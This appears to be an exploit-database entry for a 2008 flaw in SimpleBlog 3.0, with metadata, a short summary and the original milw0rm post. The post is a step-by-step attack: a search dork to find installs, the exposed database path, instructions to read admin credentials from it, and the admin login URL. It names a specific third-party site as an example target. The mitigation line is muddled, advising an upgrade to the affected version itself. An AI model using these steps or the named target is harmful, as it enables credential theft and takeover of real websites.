SimpleBlog 3.0 Mdb Vulnerability

vendor:

SimpleBlog

by:

EL_MuHaMMeD

7.5

CVSS

HIGH

Mdb Vulnerability

287

CWE

Product Name: SimpleBlog

Affected Version From: 3

Affected Version To: 3

Patch Exists: Yes

Related CWE: N/A

CPE: a:8pixel:simpleblog:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SimpleBlog 3.0 Mdb Vulnerability

SimpleBlog 3.0 is vulnerable to an authentication bypass vulnerability. An attacker can download the mdb file from the web server and read the admin name and password from the 'users' table. The attacker can then access the admin panel by visiting the default.asp page.

Mitigation:

Upgrade to the latest version of SimpleBlog 3.0

Source

Exploit-DB raw data:

[Â»] SimpleBlog 3.0 Mdb Vulnerability
[Â»]
[Â»] ----------------------------------------------------------
[Â»] Author : EL_MuHaMMeD
[Â»]
[Â»] Date : 26.11.2008
[Â»]
[Â»] Contact : cwelmuhammed@gmail.com
[Â»]
[Â»] -----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp

 

[Â»] ----------------------------------------------------------------------
[Â»]
[Â»] Cyber-Security.ORG - ELMuHaMMeD.COM
[Â»]
[Â»] ----------------------------------------------------------------------

# milw0rm.com [2008-11-25]